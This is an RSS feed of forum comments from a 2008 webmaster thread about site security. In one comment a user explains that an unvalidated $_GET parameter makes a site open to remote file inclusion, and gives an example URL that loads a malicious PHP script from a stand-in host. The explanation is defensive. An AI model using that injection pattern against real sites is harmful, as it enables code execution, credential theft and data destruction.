<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xml:base="https://www.webmaster-forums.net/crss/node/1040559" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title></title>
    <link>https://www.webmaster-forums.net/crss/node/1040559</link>
    <description></description>
    <language>en</language>
          <item>
    <title>unfortunately there is no</title>
    <link>https://www.webmaster-forums.net/server-management/site-security#comment-1228125</link>
    <description> &lt;p&gt;unfortunately there is no unique secure thing to procect themselves from the hackers.&lt;/p&gt;
 </description>
     <pubDate>Mon, 28 Jan 2008 14:17:00 +0000</pubDate>
 <dc:creator>akopayan</dc:creator>
 <guid isPermaLink="false">comment 1228125 at https://www.webmaster-forums.net</guid>
  </item>
  <item>
    <title>I think it can be if the</title>
    <link>https://www.webmaster-forums.net/server-management/site-security#comment-1228022</link>
    <description> &lt;p&gt;I think it can be if the hacker is experienced enough.&lt;/p&gt;
 </description>
     <pubDate>Tue, 22 Jan 2008 15:35:42 +0000</pubDate>
 <dc:creator>knorr</dc:creator>
 <guid isPermaLink="false">comment 1228022 at https://www.webmaster-forums.net</guid>
  </item>
  <item>
    <title>The way you have it set up,</title>
    <link>https://www.webmaster-forums.net/server-management/site-security#comment-1227992</link>
    <description> &lt;p&gt;The way you have it set up, yes, it is possible to do some malicious things.  I don&#039;t think that specific log entry was the culprit.  I think your site was a victim of remote code execution.&lt;/p&gt;
&lt;p&gt;The problem is that you&#039;re assuming that the user input is going to be valid, so you don&#039;t verify it.  That $_GET input is actually easily changeable.  If I had to get into a site that&#039;s setup like that, I would put a malicious PHP script on my server, let&#039;s say at &lt;a href=&quot;http://www.example.com/bad/script.php&quot; title=&quot;http://www.example.com/bad/script.php&quot;&gt;http://www.example.com/bad/script.php&lt;/a&gt;.  Then, I would go to your website and call up &lt;a href=&quot;http://yoursite.com/index.php?p=http://www.example.com/bad/script.php&quot; title=&quot;http://yoursite.com/index.php?p=http://www.example.com/bad/script.php&quot;&gt;http://yoursite.com/index.php?p=http://www.example.com/bad/script.php&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The PHP script that&#039;s being loaded from my server, could have any dangerous command that could scan your PHP code for database passwords or simply (but devastatingly) delete all your files.&lt;/p&gt;
 </description>
     <pubDate>Mon, 21 Jan 2008 15:05:10 +0000</pubDate>
 <dc:creator>pr0gr4mm3r</dc:creator>
 <guid isPermaLink="false">comment 1227992 at https://www.webmaster-forums.net</guid>
  </item>
  </channel>
</rss>
